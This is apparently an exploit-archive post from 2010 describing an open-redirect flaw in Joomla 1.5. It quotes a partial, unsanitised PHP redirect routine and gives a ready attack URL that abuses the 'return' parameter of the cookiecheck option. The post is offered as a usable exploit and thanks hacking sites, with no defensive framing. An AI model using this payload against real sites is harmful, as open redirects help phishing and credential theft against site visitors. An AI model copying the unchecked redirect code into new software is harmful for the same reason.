1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 |
============================================ Joomla! (Multiple) ExploiT ============================================ #PoweredJoomla! 1.5 & All version Down(Multiple) # Author: Mr.MLL # Published: 2010-08-24 # Verified: yes # Download Exploit Code # Download N/A === # Software :http://www.joomla.org/download.html # Vendor :http://www.joomla.org/ # Contact:Y-3@hotmail.com === <?php } if ( $return && !( strpos( $return, 'com_registration' ) || strpos( $return, 'com_login' ) ) ) { // checks for the presence of a return url // and ensures that this url is not the registration or login pages // If a sessioncookie exists, redirect to the given page. Otherwise, take an extra round for a cookiecheck if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) { mosRedirect( $return ); } else { mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $return ) ); } } else { // If a sessioncookie exists, redirect to the start page. Otherwise, take an extra round for a cookiecheck if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) { mosRedirect( $mosConfig_live_site .'/index.php' ); } else { mosRedirect( $mosConfig_live_site .'/index.php?option=cookiecheck&return=' . urlencode( $mosConfig_live_site .'/index.php' ) ); } } } else if ($option == 'logout') { $mainframe->logout(); // JS Popup message if ( $message ) { ?> ========= # ExploiT http://127.0.0.1/path/index.php?option=cookiecheck&return=http://Google.com/ ========= # Thanks : milw0rm.com & exploit-db.com& offsec.com & inj3ct0r.com & www.hack0wn.com exit ,, / Praise be to God for the blessing of Islam |